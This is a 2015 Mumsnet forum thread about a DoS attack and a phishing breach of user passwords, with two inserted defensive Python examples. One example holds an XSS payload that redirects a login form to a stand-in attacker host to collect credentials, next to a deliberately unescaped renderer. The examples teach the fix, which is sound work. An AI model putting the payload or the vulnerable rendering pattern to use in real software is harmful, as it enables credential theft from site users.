
More about the Technical side of the attacks on Mumsnet

720 replies

JustineMumsnet · 19/08/2015 11:17

Hi all,
There have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team - is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began proactively defending against them, minimising their impact and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyse, so it can be slow going at times. We are working with our technology partners, who have a lot of experience of these kinds of attacks, and we have used lots of the resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial of Service (DoS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DoS, though we believe it was perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as, say, your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on the Open Web Application Security Project (OWASP) top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to redirect the login process to their own site: a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the latter. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged in since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it: we don't want to rush and end up creating bigger holes. But we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

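To make the XSS route described in the post concrete, here is an added Python example (not code from Mumsnet or from anyone in this thread) of the vulnerable pattern beside its fix: a page renderer that drops a poster's text into the HTML verbatim, next to one that HTML-escapes it, both fed a constructed payload of the kind the post describes. The page skeleton, the `login` form id and the `attacker.invalid` host are placeholders chosen for this example, and `script_tag_count` is a small check that uses the standard library's HTML parser to count `<script>` elements a browser would actually run.

```python
import html
from html.parser import HTMLParser

# Minimal page skeleton standing in for a Talk page that carries the site's
# login form. The form id and markup are this example's placeholders, not the
# real site's.
PAGE_TEMPLATE = (
    "<html><body>"
    "<form id='login' action='/login' method='post'>"
    "<input name='username'><input name='password' type='password'>"
    "</form>"
    "{posts}"
    "</body></html>"
)

# Constructed illustration of the class of payload the post describes: script
# text inside a post body that, if rendered unescaped, points the login form at
# a host the attacker controls. attacker.invalid is a reserved placeholder name.
XSS_PAYLOAD = (
    "Lovely thread!"
    "<script>document.getElementById('login').action="
    "'https://attacker.invalid/collect';</script>"
)


def render_post_unsafe(author, body):
    """Vulnerable rendering: the poster's text goes into the page verbatim."""
    return f"<div class='post'><b>{author}</b><p>{body}</p></div>"


def render_post_safe(author, body):
    """Hardened rendering: every user-controlled value is HTML-escaped, so
    '<' becomes '&lt;' and the browser sees text, never markup."""
    return (f"<div class='post'><b>{html.escape(author)}</b>"
            f"<p>{html.escape(body)}</p></div>")


def render_page(posts, renderer):
    """Assemble the page from (author, body) pairs using the given renderer."""
    return PAGE_TEMPLATE.format(posts="".join(renderer(a, b) for a, b in posts))


class _TagCounter(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def script_tag_count(document):
    """Count the <script> elements a browser would execute in this page."""
    counter = _TagCounter()
    counter.feed(document)
    counter.close()
    return counter.tags.count("script")


if __name__ == "__main__":
    posts = [("alice", "Hello"), ("mallory", XSS_PAYLOAD)]
    print("unsafe:", script_tag_count(render_page(posts, render_post_unsafe)))  # 1
    print("safe:  ", script_tag_count(render_page(posts, render_post_safe)))    # 0
```

Output encoding at the point where user text meets HTML is the fix for this sink; the escaped page still shows the poster's text, including the would-be script, but as inert characters. A Content-Security-Policy header that disallows inline script is worth adding as a second layer, because a single missed sink elsewhere in a codebase as old as the post admits to is exactly how this class of bug survives review.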
JustineMumsnet · 20/08/2015 11:22

@JustineMumsnet

[quote tigerscameatnight] Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

Insight data (including product testing) is kept in a different system and protected with a username/password combination which is changed regularly and set by our tech team. We have no reason to think this system was compromised.

Local data is only accessible by individual LEs or admin. Admin access was shut down last week - we don't know for sure what was accessed prior to that but we have no evidence to suggest it was.[/quote]

Update - we don't store addresses relating to local in the part of admin that was breached - they are kept elsewhere and password protected.

tigerscameatnight · 20/08/2015 11:29

thank you!

tigerscameatnight · 20/08/2015 11:29

although hopefully by a password better than teaandcustardcreams ... Wink

Altinkum · 20/08/2015 11:30

This reply has been deleted

Message withdrawn at poster's request.

clam · 20/08/2015 11:48

Sorry if this has been covered already and not sure if it's relevant but have just remembered that I was PM'd on FB by my cousin, who said that my email account was apparently sending out virus links. Just checked: this was August 6th.
(I know this can happen anyway, from other sources)

PolkadotsAndMoonbeams · 20/08/2015 12:02

Thank you - that makes sense Smile

ChristineDePisan · 20/08/2015 12:12

Thanks for the update. I was booted off again overnight and had to log in again - at least this time I was able to use my (second) complex password rather than re-set it to be able to get in. Oh well

RedToothBrush · 20/08/2015 13:52

Maryz Wed 19-Aug-15 13:43:44
I'm not particularly impressed by Justine's wording:
"no site can guarantee complete security but ultimately if you feel compromised or worried then you can and should leave because we're here to make folks easier, not the reverse."

Imagine if a bank said that...

I've been told to ask the following

What measures are in place to prevent brute force?
What is their unit test and automation test coverage of the code?
Have they undergone either blackbox or white box penetration testing?
How are passwords stored in the database? (you want encryption method, guaranteed unique and unstored salt generated by computation).

I've said I am unlikely to get answers to the above (which is gibberish to me), but I'm asking anyway. (To which I got the response that if they don't answer that, they have something to hide and a hacker would be able to guess any issues. Personally since I don't know what the above actually means, I'm not sure I can share that opinion).

My gut feeling is that MN, despite always having been an obvious target, have never really taken this threat seriously enough, and that's why they have had to get in outside help now in response to this, which is acting after the cart has bolted.

Yes no one is guaranteed complete security but if you are high risk / high profile you should be doing more than a lot of other sites.

Anyway my baby has just done a rather smelly shit so I need to go change his nappy and ponder my general online security and password strength.

My sympathies to MNHQ to a degree, and to anyone massively stressed out about this. I just want this resolved going forward at this point and MNHQ to learn from this and get their act together in future... as I think they were caught with their knickers firmly around their ankles on this one and should feel more embarrassed than the messages coming out of HQ seem to suggest.

leedy · 20/08/2015 14:03

RedToothBrush, DavidTech already answered upthread about the password storage, passwords are all hashed.

"We use a bcrypt hash with a modular crypt, salt of course, and a high cost to minimize the likelihood of rainbow table attacks."

I'm sure he can answer the other questions as well if/when he's not too busy fixing things.

Also not sure why you feel like you're unlikely to get any answers. Obviously there was a security hole that shouldn't have been there, but I don't get the impression that they'd just written all our passwords in crayon somewhere and blithely gone "fuck security! who cares!".
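
The password storage Justine and DavidTech describe (a salted, high-cost hash that MNHQ cannot reverse) and the mistyped-passwords argument from the OP, as one added Python example; this is not code from the site or from anyone in the thread. `hashlib.scrypt` from the standard library stands in for bcrypt because it has the same shape: a random per-user salt plus a tunable work factor, producing a one-way digest. The cost parameters, the user names and the leaked list are constructed for the demo.

```python
import hashlib
import hmac
import os

# Cost parameters for this example only; the post gives no figures for the
# site's own settings. 128 * N * r bytes of memory per hash, here 16 MiB.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32


def hash_password(password, salt=None):
    """Return a self-describing record: scheme, cost parameters, salt, digest.

    A fresh random salt per user means two users with the same password, or
    the same user on two sites, get unrelated digests."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return "$".join(["scrypt", str(SCRYPT_N), str(SCRYPT_R), str(SCRYPT_P),
                     salt.hex(), digest.hex()])


def verify_password(password, record):
    """Recompute the digest from the stored salt and parameters and compare in
    constant time, so the comparison itself leaks nothing about the stored value."""
    scheme, n, r, p, salt_hex, digest_hex = record.split("$")
    if scheme != "scrypt":
        raise ValueError("unknown scheme: " + scheme)
    candidate = hashlib.scrypt(password.encode("utf-8"),
                               salt=bytes.fromhex(salt_hex),
                               n=int(n), r=int(r), p=int(p),
                               dklen=len(digest_hex) // 2)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def triage_leaked_credentials(leak, stored):
    """Classify each leaked (username, plaintext) pair against the stored records.

    The hash table cannot yield plaintexts, so a list of plaintexts was captured
    somewhere the password was typed. Pairs that verify are live credentials
    that must be reset; pairs that do not are the mistyped entries the OP
    mentions, which only a capture at entry time would contain."""
    result = {}
    for username, plaintext in leak:
        record = stored.get(username)
        if record is None:
            result[username] = "unknown-user"
        elif verify_password(plaintext, record):
            result[username] = "valid"
        else:
            result[username] = "mismatch"
    return result


# Constructed sample data: two real accounts, and a leaked list in which one
# entry is a mistyped password and one names an account that does not exist.
STORED = {
    "alice": hash_password("correct horse battery staple"),
    "bob": hash_password("custardcreams!"),
}
LEAK = [
    ("alice", "correct horse battery staple"),
    ("bob", "custardcream!"),      # missing an 's': typed wrong on the fake form
    ("carol", "whatever"),
]

if __name__ == "__main__":
    print(triage_leaked_credentials(LEAK, STORED))
    # {'alice': 'valid', 'bob': 'mismatch', 'carol': 'unknown-user'}
```

`triage_leaked_credentials` is the check an incident responder runs against a published list: anything that verifies is a live credential to reset, and anything that does not verify cannot have come out of the hash table, which supports the capture-at-entry theory. One caveat on the rainbow-table wording in the quote above: the salt is what defeats precomputed tables, while the cost factor is what slows a targeted guess at one user's weak password, so the two settings do different jobs and a high cost does not rescue a password like "password1".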

SouthAmericanCuisine · 20/08/2015 14:39

Quick question - either for MN techies, or others.

An IP address associated with my (old) account was published on "the list".

Could someone geeky in RL, who knows how to find out what my home/work IP address is, search the list and find that IP address and therefore find my (old) MN username?

akkakk · 20/08/2015 14:41

RedToothBrush they are all good questions even if a bit geeky :) but geeky is cool now Grin

the obvious reality is that no, Mumsnet haven't been doing everything possible - but let's also be realistic, most websites don't - all security is a balance:

  • user's responsibility v. website's responsibility
  • hard for normal people to use v. easy to hack
  • cost v. need
etc.

I started a list in site stuff called after the storm - suggesting in outline some of what you post - perhaps you could add those suggestions there...

it is not unreasonable to expect that security is increased after this - up to MN how much they do, but there is certainly no future excuse of not being aware of what is needed :)

leedy · 20/08/2015 14:42

You can pretty much change your IP address by switching your router off and switching it back on again, so it seems unlikely someone could both find your current IP address and match it to a previous one you used.

SouthAmericanCuisine · 20/08/2015 14:47

But what if the router has not been turned off and on again? (of course I'll do that now!)

I'm thinking not of random strangers, but spouses and DCs who know their spouse/mum has a MN account, and who check the list to see if they can find the username and have a peek at previous posts?

Given that there is some speculation that this is the work of a bitter-ex, I don't think it's that unlikely.

Is it technically possible?

RedToothBrush · 20/08/2015 15:16

IP addresses need not be specific to a particular person/address.

Some people will share an IP address (eg if you use the same internet provider. Users in a similar geographical area will share an IP address).

Some IP addresses stay the same. Some will change regularly (eg with the router being switched off or the day changing).

Some will be recycled.

It really depends on who your provider is I think. But as I say previously, I'm not a geek and my understanding is pretty limited.

Needless to say, I would not worry too much about IP addresses as they are pretty useless for identifying an individual in the way you describe. This is why they can't be used to block trolls.

RebeccaMumsnet · 20/08/2015 16:17

@wannaBe

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has learning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

Hi wannaBe,

Thanks for the heads up, we have had a look and have no reason to believe that this is a hacked account. Thanks for the heads up and apologies for the delay.

akkakk · 20/08/2015 17:22

RedToothBrush

in effect people don't share an IP address - while you are using it then the IP address does identify you / your network / your router etc. (actually you on your broadband supplier's computer)

a dynamic ip address is simply that you are allocated one from a pool each time you request one and the pool could be thousands of ip addresses - each time you turn your router off and back on, you will probably get a different one...

it is rather like a drawer of socks - you are wearing the red pair today, you can carry on wearing them for the next year - but as soon as you wash them, the next pair you pull out could be the blue pair, or the green pair... at that point someone else might pull out the red pair and wear them - but you can't both wear the red pair at the same time :)

however, to all intents and purposes - the IP address won't harm anyone... if you are worried about a spouse matching it:

  • turn your router off and back on to reset it
  • change your username
  • change your password

no issues :)

RustyParker · 20/08/2015 18:07

I'm not on the list but just remembered that a couple of days ago I had a notification from Facebook saying someone had requested a reset of my FB password. Could this be linked?

Pneumometer · 20/08/2015 18:42

"however, to all intents and purposes - the IP address won't harm anyone..."

Because, fortunately, no-one ever uses MN from work, or from a university, or has a home business with a business broadband product which has a static IP number, or uses Virgin Media whose IP addresses tend to be sticky over a long period of time....

KeepTheCarRunning · 20/08/2015 18:50

I'm on the list and spent yesterday changing passwords for my entire life... Been following this as much as work permits but may have missed the finer points of 4000+ posts, so can anyone help me out here: if my MN name and password is on the list, is there any chance that the hacker also has my RL name? I put that on my profile when I registered some 6 yrs ago and I'm very identifiable by that... I have to dereg I suppose? Sad I like my name

akkakk · 20/08/2015 19:04

Pneumometer - true some people might be on MN instead of working :) but probably not Grin

even if the ip address is known - how is that going to help any hacker do anything exciting with it?!

let's not scare people unnecessarily...

KeepTheCarRunning If they logged into your account then they could see any information you had in there - there is no suggestion that they did this for every account, though that they might have done for a few...

BoneyBackJefferson · 20/08/2015 19:50

As someone that was on the list, I noticed that several (including myself) didn't have passwords attached.

Do you have a suggestion as to why this would be?

ItsAllGoingToBeFine · 20/08/2015 19:54

Do you have a suggestion as to why this would be?

I would guess you just refreshed while on the phishing page, or hit enter without putting in password, but that your username was autocompleted?

BoneyBackJefferson · 20/08/2015 19:58

So just luck then.

KeepTheCarRunning · 20/08/2015 20:20

Thanks akkakk looks like a dereg might be wiser...

SouthAmericanCuisine · 20/08/2015 20:29

Akkakk. My concern isn't the hacker, I couldn't give a toss what s/he reads.

My worry is the anonymity of the posts I made under the username that has been publicly linked to my IP address. Can someone who knows my IP address (my boss, my DC, my spouse) work out which is my username by linking it to an IP address they already know from the list?

It seems that the answer is possibly. That doesn't sit well with me.

Are MNHQ going to make provision for the complete posting histories of those usernames to be deleted if they wish?